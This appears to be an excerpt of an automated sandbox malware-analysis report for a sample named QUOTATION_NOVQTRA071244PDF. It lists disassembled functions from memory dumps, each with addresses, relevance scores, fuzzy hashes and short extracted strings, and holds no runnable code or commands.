Source File: 00000000.00000002.1928650413.00007FF7C1280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c1280000_QUOTATION_NOVQTRA071244PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70218504a0f0d19ccf1f594bb7ff2c6aaf563108f120722cfce076b9d8ae91d4
Instruction ID: e4b6a46ffcb30dee42cbdfbc93599ec0474cf12815d0f7064aaa5974a4c0da3f
Opcode Fuzzy Hash: 70218504a0f0d19ccf1f594bb7ff2c6aaf563108f120722cfce076b9d8ae91d4
Instruction Fuzzy Hash: F1D2B531A18A498FEB98EF18C480BA9B7F2FF59314F5441B9D04ED7692DA34EC81CB50

Function 00007FF7C1063240 Relevance: 1.5, Instructions: 1526COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1926612021.00007FF7C1060000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c1060000_QUOTATION_NOVQTRA071244PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d014689755f4975e3452b3e02361d7412546211716e80ef8cfedac0cf2703889
Instruction ID: 27da9718217b9a772b7be10174857ad22f992f680d4d922f2726f850f2918f26
Opcode Fuzzy Hash: d014689755f4975e3452b3e02361d7412546211716e80ef8cfedac0cf2703889
Instruction Fuzzy Hash: 5AC28370619A498FD30BCF24C460A657B72FF8A304FB845EEC40ADFA96CA357896C750

Function 00007FF7C1290BF3 Relevance: 1.5, Strings: 1, Instructions: 268COMMON

Download Yara Rule

Strings

8*_^, xrefs: 00007FF7C1290C01

Memory Dump Source

Source File: 00000000.00000002.1928650413.00007FF7C1280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c1280000_QUOTATION_NOVQTRA071244PDF.jbxd

Similarity

API ID:
String ID: 8*_^
API String ID: 0-2431774988
Opcode ID: 2a600965cb08ec108fa331dbc55374345c2a509c0e7eafeb99d5d6a0c7f41b1b
Instruction ID: 76fd4d88610a89d744facccb62ad74b89d5b87bd17c835b34cd295afada5c8be
Opcode Fuzzy Hash: 2a600965cb08ec108fa331dbc55374345c2a509c0e7eafeb99d5d6a0c7f41b1b
Instruction Fuzzy Hash: C081F76160EBC66FD302273D48642E0FFA5EF03368B5901F7C4C88B493DE26B85683A5

Function 00007FF7C12929A0 Relevance: 1.2, Instructions: 1244COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1928650413.00007FF7C1280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c1280000_QUOTATION_NOVQTRA071244PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b6cfd2b2d57d1db3b0545a8ec133336b4f144467638c2db3ad6505bb85bb420
Instruction ID: 0ffe9aaeeed3db0b0aef8a451d12b2622f2024719e24587f21cb47f5f5cc375a
Opcode Fuzzy Hash: 8b6cfd2b2d57d1db3b0545a8ec133336b4f144467638c2db3ad6505bb85bb420
Instruction Fuzzy Hash: 78925B79A0D6C64FE769EF2C84166A4BBE0EF56330F4401F9C48DCB5A3DA5C6C0A8761

Function 00007FF7C1291AD0 Relevance: 1.1, Instructions: 1139COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1928650413.00007FF7C1280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c1280000_QUOTATION_NOVQTRA071244PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7440f09853b2251851411eeb517ba49da7d4504a5fb190ea0b0b8b326a5bc031
Instruction ID: ae16be02def92c0a99ff8afc885a99f9c5661f8910d9091db62b068183bd7ef0
Opcode Fuzzy Hash: 7440f09853b2251851411eeb517ba49da7d4504a5fb190ea0b0b8b326a5bc031
Instruction Fuzzy Hash: 4F72E435B0CA498FEBA9EF2CC455A64B7E1FF59320F4401B9D08EC72A2DE68EC458751

Function 00007FF7C12888A0 Relevance: .8, Instructions: 781COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1928650413.00007FF7C1280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c1280000_QUOTATION_NOVQTRA071244PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92b26894950e69222cfcb07315e231aad87ff8e75b95873bf12106d52ebe6352
Instruction ID: ef46059ba05a0a29bba357cc2d502b19d4f9aa3894a61917fdaabc1f756f7c32
Opcode Fuzzy Hash: 92b26894950e69222cfcb07315e231aad87ff8e75b95873bf12106d52ebe6352
Instruction Fuzzy Hash: D832AE31B189098FEB98EF2C8459B75B7E1FF99320F4541B9E44EC76A2DE24EC418741

Function 00007FF7C12991B0 Relevance: .7, Instructions: 677COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1928650413.00007FF7C1280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c1280000_QUOTATION_NOVQTRA071244PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a972648f8ed067c347ade704b2de9502bcf8874baa4a432e3dd0f51a2908dc46
Instruction ID: 2d03b877b6b69e26bcb94c257977891241a6eac6878ec018a29ed71e2a56ef7d
Opcode Fuzzy Hash: a972648f8ed067c347ade704b2de9502bcf8874baa4a432e3dd0f51a2908dc46
Instruction Fuzzy Hash: B4221334B0CB864FEB69AF2C94542B9B7E1FF55334F54067ED08AC32D2DE68A8428751

Function 00007FF7C1203070 Relevance: .5, Instructions: 541COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1928152559.00007FF7C1200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c1200000_QUOTATION_NOVQTRA071244PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d5db9f305e129905dd4e9ffe79c6329c4770fb4a96fa3da0f4e48e9bcf6b870b
Instruction ID: 53944456441123e37d4022431e7dc1a8e82cdf01a08abe7550ed22f014bcd864
Opcode Fuzzy Hash: d5db9f305e129905dd4e9ffe79c6329c4770fb4a96fa3da0f4e48e9bcf6b870b
Instruction Fuzzy Hash: A012F974A0891A9FEF94EF68C8857A9B7B1FF58310F508275C40DE3681DB78A991CB90

Function 00007FF7C1284CF4 Relevance: .5, Instructions: 513COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1928650413.00007FF7C1280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c1280000_QUOTATION_NOVQTRA071244PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f48c45a8ee90b4f5d571b7376e542aa7957274543d7f646266c62c11eb0d4d3
Instruction ID: 3bc325ca71ca3a7e703ccf67c2085dd1c445617f119f7e097c6bd9464edeffcb
Opcode Fuzzy Hash: 5f48c45a8ee90b4f5d571b7376e542aa7957274543d7f646266c62c11eb0d4d3
Instruction Fuzzy Hash: F1029C35A18A098FEB98EF18C4847A9B7E1FF58315F5041BED00ED7692DA75AC82CB50

Function 00007FF7C1062093 Relevance: .4, Instructions: 361COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1926612021.00007FF7C1060000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c1060000_QUOTATION_NOVQTRA071244PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42a82d46470e056152221cd8868f0a91ba27070405735b3dce6df0946c0df7e7
Instruction ID: 0371d128285c81b067e667d1ab71b425cd57940fb00d6ca5910d6e70f91eb523
Opcode Fuzzy Hash: 42a82d46470e056152221cd8868f0a91ba27070405735b3dce6df0946c0df7e7
Instruction Fuzzy Hash: AFB1A130B1C95A8FEB98EF5884556FCB3E2EF99320F550179D84EC7296CE68AC818750

Function 00007FF7C1061B88 Relevance: .2, Instructions: 188COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1926612021.00007FF7C1060000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c1060000_QUOTATION_NOVQTRA071244PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33b9fc0425f7047c2bdd47f0303ee80d669a1607e10c3e2e90d2fce1185459a0
Instruction ID: b06ed3261869ce3faceb3492f880eba00f4fcb89021595defae63fc0b76e9328
Opcode Fuzzy Hash: 33b9fc0425f7047c2bdd47f0303ee80d669a1607e10c3e2e90d2fce1185459a0
Instruction Fuzzy Hash: A951173090D7C64FD35AAB348854575BFE0EF57224B4A02FAD489CB1E3DD68A846C361

Function 00007FF7C128BDD0 Relevance: 3.8, Strings: 3, Instructions: 1COMMON

Download Yara Rule

Strings

3X, xrefs: 00007FF7C128DCDF, 00007FF7C128DFF3
&, xrefs: 00007FF7C128E39D
', xrefs: 00007FF7C128E3A5

Memory Dump Source

Source File: 00000000.00000002.1928650413.00007FF7C1280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c1280000_QUOTATION_NOVQTRA071244PDF.jbxd

Similarity

API ID:
String ID: 3X$&$'
API String ID: 0-1518844431
Opcode ID: 92755397026a5fa7e36a6e17fa95e5cafe1fce569b998a58ff259521ab70051e
Instruction ID: 81ad651b672eac9ebc170da5744969336266a0aef356b47c8f1f874bcd57ec30
Opcode Fuzzy Hash: 92755397026a5fa7e36a6e17fa95e5cafe1fce569b998a58ff259521ab70051e
Instruction Fuzzy Hash:

Function 00007FF7C128819F Relevance: 2.8, Strings: 2, Instructions: 317COMMON

Download Yara Rule

Strings

H, xrefs: 00007FF7C12881AA
Kp, xrefs: 00007FF7C12885E5

Memory Dump Source

Source File: 00000000.00000002.1928650413.00007FF7C1280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c1280000_QUOTATION_NOVQTRA071244PDF.jbxd

Similarity

API ID:
String ID: H$Kp
API String ID: 0-388900659
Opcode ID: e061c7b6bbba305a029297a195ca1767ddc9b2a23566f32b4ef005eb9ae45dd8
Instruction ID: ca1898e7283347e6f887c99ce789e67e643de8da34113fe3ae00f07ff264d873
Opcode Fuzzy Hash: e061c7b6bbba305a029297a195ca1767ddc9b2a23566f32b4ef005eb9ae45dd8
Instruction Fuzzy Hash: 1FA1A025B08A4A4FFB98EF188454779B7E1FF58310F9441B9D48EC7AC7DE68E8858350

Function 00007FF7C10610CD Relevance: 2.7, Strings: 2, Instructions: 194COMMON

Download Yara Rule

Strings

x#' , xrefs: 00007FF7C1061142
`$' , xrefs: 00007FF7C1061130

Memory Dump Source

Source File: 00000000.00000002.1926612021.00007FF7C1060000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c1060000_QUOTATION_NOVQTRA071244PDF.jbxd

Similarity

API ID:
String ID: `$' $x#'
API String ID: 0-2341113889
Opcode ID: e8b73c5c2ef54bf026cf14c197a6bccadfb062dd2745d102d3edaeaf875c1604
Instruction ID: 2cb95963e0a61445448f2bc9a9f51981e7a970b431ac5ccd160f86655eb53419
Opcode Fuzzy Hash: e8b73c5c2ef54bf026cf14c197a6bccadfb062dd2745d102d3edaeaf875c1604
Instruction Fuzzy Hash: 11510671F0885A8FE794EB6C84447B8B3E2FB99360F5501B5D44DC7287CE78AC828790

Function 00007FF7C128E6C0 Relevance: 2.1, Strings: 1, Instructions: 877COMMON

Download Yara Rule

Strings

+e, xrefs: 00007FF7C128EBE1, 00007FF7C128EC12

Memory Dump Source

Source File: 00000000.00000002.1928650413.00007FF7C1280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c1280000_QUOTATION_NOVQTRA071244PDF.jbxd

Similarity

API ID:
String ID: +e
API String ID: 0-2946104354
Opcode ID: 22b9a61e8a5a9379d1454bd9fa12ae74b2a13188be20fac5d5136f96e433a15d
Instruction ID: ccfdd0c7bb86e46e10a21a2c727b0ce7c91b66029edca1cfedec0fb742584a82
Opcode Fuzzy Hash: 22b9a61e8a5a9379d1454bd9fa12ae74b2a13188be20fac5d5136f96e433a15d
Instruction Fuzzy Hash: EB52F635A189498FEB98FF28C855AA9BBE1FF59310F5001B9D40DCB692CA74EC52C790

Function 00007FF7C1282368 Relevance: 2.0, Strings: 1, Instructions: 710COMMON

Download Yara Rule

Strings

Kp, xrefs: 00007FF7C12885E5

Memory Dump Source

Source File: 00000000.00000002.1928650413.00007FF7C1280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c1280000_QUOTATION_NOVQTRA071244PDF.jbxd

Similarity

API ID:
String ID: Kp
API String ID: 0-2813948782
Opcode ID: cedf29aef99f5fff374ef1b147215471e464e62c6530c3456a47097de8c8173e
Instruction ID: 0e22e77bff9bd8584a03b605e71913a8390470b893f5a4666acf7646b39e01b0
Opcode Fuzzy Hash: cedf29aef99f5fff374ef1b147215471e464e62c6530c3456a47097de8c8173e
Instruction Fuzzy Hash: F822EF35B08A494FEB98EF2884557B9B7E1FF99310F5401BDD44EC3A93CE78A8528790

Function 00007FF7C128B565 Relevance: 1.8, Strings: 1, Instructions: 553COMMON

Download Yara Rule

Strings

d, xrefs: 00007FF7C128B7E9

Memory Dump Source

Source File: 00000000.00000002.1928650413.00007FF7C1280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c1280000_QUOTATION_NOVQTRA071244PDF.jbxd

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: d373402234b5585ad323feb283f057ec054d8abf29cd76691502a6caa2e07b08
Instruction ID: d1b5d0f6cffd6a1d1980f80d080fc9e850a13357342680f7dc45cc99a7dbb719
Opcode Fuzzy Hash: d373402234b5585ad323feb283f057ec054d8abf29cd76691502a6caa2e07b08
Instruction Fuzzy Hash: EB02FF31718A068FEB48EF288485679B3E1FF99324B5446BDD44EC7697DE34E842CB81

Function 00007FF7C1282D48 Relevance: 1.7, Strings: 1, Instructions: 491COMMON

Download Yara Rule

Strings

@, xrefs: 00007FF7C1291307

Memory Dump Source

Source File: 00000000.00000002.1928650413.00007FF7C1280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c1280000_QUOTATION_NOVQTRA071244PDF.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: ebc92f53678e09ab84a1fa498063c832ad7e01beb41e859132b13bb496a5c1da
Instruction ID: 2a201e3bac5d549095eaab6010d5eb6c10dc0bacc3db6cc2bc7eda3cc1a8e780
Opcode Fuzzy Hash: ebc92f53678e09ab84a1fa498063c832ad7e01beb41e859132b13bb496a5c1da
Instruction Fuzzy Hash: FEE10535B0CB4A4FE755AB2D9455375B7E1EF86330F4402BAD48AC72D3DE68AC428391

Function 00007FF7C1203ABD Relevance: 1.7, Strings: 1, Instructions: 487COMMON

Download Yara Rule

Strings

2_H, xrefs: 00007FF7C1203FEF

Memory Dump Source

Source File: 00000000.00000002.1928152559.00007FF7C1200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c1200000_QUOTATION_NOVQTRA071244PDF.jbxd

Similarity

API ID:
String ID: 2_H
API String ID: 0-1234483377
Opcode ID: 7278b7b21313284bbd6c560db51fb26d63be5a32659db52d7617d4c58a9f7165
Instruction ID: 9f8566f241669ab478693904b4816c873c544923d9641499e29ed0154c6ec4b1
Opcode Fuzzy Hash: 7278b7b21313284bbd6c560db51fb26d63be5a32659db52d7617d4c58a9f7165
Instruction Fuzzy Hash: 3E020634A09A1ECFEB94EF6884947BDB7B1FF59311F904179D40DA2692CB786881CB50

Function 00007FF7C12880CF Relevance: 1.7, Strings: 1, Instructions: 406COMMON

Download Yara Rule

Strings

Kp, xrefs: 00007FF7C12885E5

Memory Dump Source

Source File: 00000000.00000002.1928650413.00007FF7C1280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c1280000_QUOTATION_NOVQTRA071244PDF.jbxd

Similarity

API ID:
String ID: Kp
API String ID: 0-2813948782
Opcode ID: a3371a4b4c9a1ea7ca37058b753eb8fcac75ffcca6c8c990ab65a327aa7e8f0c
Instruction ID: 9bad7f57b07b8ca28dcb47d93f31ab32f177e68fda1de4ff4bd46f21dcf454d1
Opcode Fuzzy Hash: a3371a4b4c9a1ea7ca37058b753eb8fcac75ffcca6c8c990ab65a327aa7e8f0c
Instruction Fuzzy Hash: C9D11426B0CA4A4FF759AF2884547B5BBD1FF55310F9401B9C48EC7AD3DE68A846C360

Function 00007FF7C1288263 Relevance: 1.6, Strings: 1, Instructions: 374COMMON

Download Yara Rule

Strings

Kp, xrefs: 00007FF7C12885E5

Memory Dump Source

Source File: 00000000.00000002.1928650413.00007FF7C1280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c1280000_QUOTATION_NOVQTRA071244PDF.jbxd

Similarity

API ID:
String ID: Kp
API String ID: 0-2813948782
Opcode ID: 5c9132a7dd98f4acc3993a5045cec558c1ea79f67bb7daaf830217786216f4c8
Instruction ID: 2134c04f687dc65891186bd6a466c0a543c984bad8a03856c3628ba9ca5a22d1
Opcode Fuzzy Hash: 5c9132a7dd98f4acc3993a5045cec558c1ea79f67bb7daaf830217786216f4c8
Instruction Fuzzy Hash: AFC1AE35B08A4A4FFB58EF1C84417A9B7E1FF58310F9401B9D48EC7A87CE78A8868750

Function 00007FF7C12880E4 Relevance: 1.6, Strings: 1, Instructions: 354COMMON

Download Yara Rule

Strings

Kp, xrefs: 00007FF7C12885E5

Memory Dump Source

Source File: 00000000.00000002.1928650413.00007FF7C1280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c1280000_QUOTATION_NOVQTRA071244PDF.jbxd

Similarity

API ID:
String ID: Kp
API String ID: 0-2813948782
Opcode ID: 57ed217f7fbe12b52f09b8b42f211584560de61105bf8a4fedb748f916d4b428
Instruction ID: ff8d9b1e0e89cdb29e386f1787df4753d6e3792da7825849b1c6effe49f47001
Opcode Fuzzy Hash: 57ed217f7fbe12b52f09b8b42f211584560de61105bf8a4fedb748f916d4b428
Instruction Fuzzy Hash: 82B1E325B08A4A4FF798AF2C84507B9B7D1FF59310F9401BDD48EC79D7DE68A8468360

Function 00007FF7C1203759 Relevance: 1.6, Strings: 1, Instructions: 348COMMON

Download Yara Rule

Strings

2_H, xrefs: 00007FF7C1203971

Memory Dump Source

Source File: 00000000.00000002.1928152559.00007FF7C1200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c1200000_QUOTATION_NOVQTRA071244PDF.jbxd

Similarity

API ID:
String ID: 2_H
API String ID: 0-1234483377
Opcode ID: fad88fb3e319e1d0f03e2186d0ec48bf47006e4a46702a5a6618200100bce939
Instruction ID: 5d984d780966cdbbb000e76ef3cc4ce1e0c30c17a65cec2bbd05c5881ce41343
Opcode Fuzzy Hash: fad88fb3e319e1d0f03e2186d0ec48bf47006e4a46702a5a6618200100bce939
Instruction Fuzzy Hash: 43C19234A09A5D8FEB55EF68C4957ECBBB1FF59310F8041B9D009E7192CB786882CB50

Function 00007FF7C12881D9 Relevance: 1.6, Strings: 1, Instructions: 338COMMON

Download Yara Rule

Strings

Kp, xrefs: 00007FF7C12885E5

Memory Dump Source

Source File: 00000000.00000002.1928650413.00007FF7C1280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c1280000_QUOTATION_NOVQTRA071244PDF.jbxd

Similarity

API ID:
String ID: Kp
API String ID: 0-2813948782
Opcode ID: c24d37d151a002beb34f319f2677cc71552c346a6ad2ce613bc00499646bcba1
Instruction ID: 67e3b0ba9355f147415d309b01f3cd61817012ec5e5c20fbc667763d15d81d72
Opcode Fuzzy Hash: c24d37d151a002beb34f319f2677cc71552c346a6ad2ce613bc00499646bcba1
Instruction Fuzzy Hash: A3B1D225B08A4A4FFB98EF2C8454779B7E1FF59310F9401B9D48EC7AC7DE68A8458360

Function 00007FF7C1288074 Relevance: 1.6, Strings: 1, Instructions: 320COMMON

Download Yara Rule

Strings

Kp, xrefs: 00007FF7C12885E5

Memory Dump Source

Source File: 00000000.00000002.1928650413.00007FF7C1280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c1280000_QUOTATION_NOVQTRA071244PDF.jbxd

Similarity

API ID:
String ID: Kp
API String ID: 0-2813948782
Opcode ID: 93591565665d039b1e1374ebc92106440b0fe27d0f33ea958cbf83b9e9fc8cf2
Instruction ID: 4755668b02c0c2ef47467e817cc4e9a98abf9297f276dd4782a144c3a53281bf
Opcode Fuzzy Hash: 93591565665d039b1e1374ebc92106440b0fe27d0f33ea958cbf83b9e9fc8cf2
Instruction Fuzzy Hash: 23A1A125B08A4A4FFB98EE1C8450779B7E1FF59310F9401B9D48EC7AC7DE68E8858360

Function 00007FF7C1288211 Relevance: 1.6, Strings: 1, Instructions: 318COMMON

Download Yara Rule

Strings

Kp, xrefs: 00007FF7C12885E5

Memory Dump Source

Source File: 00000000.00000002.1928650413.00007FF7C1280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c1280000_QUOTATION_NOVQTRA071244PDF.jbxd

Similarity

API ID:
String ID: Kp
API String ID: 0-2813948782
Opcode ID: a2eef00bfdb71b73cbd265cc5af0429f33d6a095dfd68cc1191cc59938779596
Instruction ID: 8b4b67d6dba967adb5c028f2095c1ed72ed662d42c0ae78a216fb96f307ec58f
Opcode Fuzzy Hash: a2eef00bfdb71b73cbd265cc5af0429f33d6a095dfd68cc1191cc59938779596
Instruction Fuzzy Hash: 77A19F25B08A4A4FFB98EF188454779B7E1FF58310F9441B9D48EC7AC7DE68A8858350

Function 00007FF7C12881BD Relevance: 1.6, Strings: 1, Instructions: 317COMMON

Download Yara Rule

Strings

Kp, xrefs: 00007FF7C12885E5

Memory Dump Source

Source File: 00000000.00000002.1928650413.00007FF7C1280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c1280000_QUOTATION_NOVQTRA071244PDF.jbxd

Similarity

API ID:
String ID: Kp
API String ID: 0-2813948782
Opcode ID: 6e3fe32e779dc1bfe4d0eaf0d9148832d10eb9c1d7cfddd4f8eac991605804c1
Instruction ID: 6d093cbdf194ff03bdfd273599b4f60e036edfa5746f74debc660c4dc2447ebc
Opcode Fuzzy Hash: 6e3fe32e779dc1bfe4d0eaf0d9148832d10eb9c1d7cfddd4f8eac991605804c1
Instruction Fuzzy Hash: 7DA19025B08A4A4FFB98EE1C8450779B7E1FF58310F9401B9D48EC7AC7DE68E8858360

Function 00007FF7C128D86D Relevance: 1.5, Strings: 1, Instructions: 269COMMON

Download Yara Rule

Strings

J5_L, xrefs: 00007FF7C128D9CF

Memory Dump Source

Source File: 00000000.00000002.1928650413.00007FF7C1280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c1280000_QUOTATION_NOVQTRA071244PDF.jbxd

Similarity

API ID:
String ID: J5_L
API String ID: 0-3036941342
Opcode ID: 1f2a8c60a9e6bc861bac71ab2345ae37927c51763943317c5e040ca01e7d4ef1
Instruction ID: a96d1ceda0f44a7f972c64dd42c83ac5f7e5a4c82b06d82ebb88828dc9d60dd0
Opcode Fuzzy Hash: 1f2a8c60a9e6bc861bac71ab2345ae37927c51763943317c5e040ca01e7d4ef1
Instruction Fuzzy Hash: 14713C32B1CB8A4FE358BB2C98562F5B7D1FF95364B44417AD48EC7683DD28B8468381

Function 00007FF7C128D8F0 Relevance: 1.5, Strings: 1, Instructions: 267COMMON

Download Yara Rule

Strings

J5_L, xrefs: 00007FF7C128D9CF

Memory Dump Source

Source File: 00000000.00000002.1928650413.00007FF7C1280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c1280000_QUOTATION_NOVQTRA071244PDF.jbxd

Similarity

API ID:
String ID: J5_L
API String ID: 0-3036941342
Opcode ID: 83eeb2c58e9e416058b1f1d11bcf1a8ce121934cbad18478fd9a4537ea2687cb
Instruction ID: 5cbfd3477f7123e189503e383511265be89321ee53a7f971fc4afc02b6b4e337
Opcode Fuzzy Hash: 83eeb2c58e9e416058b1f1d11bcf1a8ce121934cbad18478fd9a4537ea2687cb
Instruction Fuzzy Hash: A7711A21B1CE4A4BE35CAB2C58562B5B3D2FF98764B94427AD44EC3783DD68B8468381

Function 00007FF7C128BD78 Relevance: 1.5, Strings: 1, Instructions: 215COMMON

Download Yara Rule

Strings

J5_L, xrefs: 00007FF7C128D9CF

Memory Dump Source

Source File: 00000000.00000002.1928650413.00007FF7C1280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c1280000_QUOTATION_NOVQTRA071244PDF.jbxd

Similarity

API ID:
String ID: J5_L
API String ID: 0-3036941342
Opcode ID: b666c435afea27af661d28648e8280a6f534c762c9faf897e97ca5c99da2f1ae
Instruction ID: 6bc97a0702415ea8fb85497f5455868c1cffce2cd9d49995b121b468ba63a69f
Opcode Fuzzy Hash: b666c435afea27af661d28648e8280a6f534c762c9faf897e97ca5c99da2f1ae
Instruction Fuzzy Hash: 56510831B1CF4A4FE358AB2C98562B5B3D1FF99364B84427ED44EC3683DD68B8468381

Function 00007FF7C1294E86 Relevance: 1.4, Strings: 1, Instructions: 195COMMON

Download Yara Rule

Strings

~, xrefs: 00007FF7C1294E86

Memory Dump Source

Source File: 00000000.00000002.1928650413.00007FF7C1280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c1280000_QUOTATION_NOVQTRA071244PDF.jbxd

Similarity

API ID:
String ID: ~
API String ID: 0-1707062198
Opcode ID: 12cb90a8ca97935769032aab19af85c5301b50422cb470be7f7444a4c4e4f00c
Instruction ID: 2d02795a98032ea3fe9b9d62974e4a71c7179530776b3d553bd1ce33e1b04627
Opcode Fuzzy Hash: 12cb90a8ca97935769032aab19af85c5301b50422cb470be7f7444a4c4e4f00c
Instruction Fuzzy Hash: 6451013470CA4A8FE795EF2CC444AA4B7E1FF59321F5401BAD04DCB692CA69AC86C790

Function 00007FF7C1294864 Relevance: 1.4, Strings: 1, Instructions: 172COMMON

Download Yara Rule

Strings

Z0_L, xrefs: 00007FF7C129488F

Memory Dump Source

Source File: 00000000.00000002.1928650413.00007FF7C1280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c1280000_QUOTATION_NOVQTRA071244PDF.jbxd

Similarity

API ID:
String ID: Z0_L
API String ID: 0-3822492010
Opcode ID: 023af2a7dbf7c61e8dfb90e44d5b8e154769ca4b497a47e25409be12fc5ca6a1
Instruction ID: 9ee861009f4b213730c92751e819c4e99a941d38b963d6d353a064bc077d1eba
Opcode Fuzzy Hash: 023af2a7dbf7c61e8dfb90e44d5b8e154769ca4b497a47e25409be12fc5ca6a1
Instruction Fuzzy Hash: 0951A13460899D8FDB89EF6CC854AA977E1FF99310B5401A9E40ED7296CA70EC42CB81

Function 00007FF7C1062C90 Relevance: 1.3, Strings: 1, Instructions: 99COMMON

Download Yara Rule

Strings

\, xrefs: 00007FF7C1062CEC

Memory Dump Source

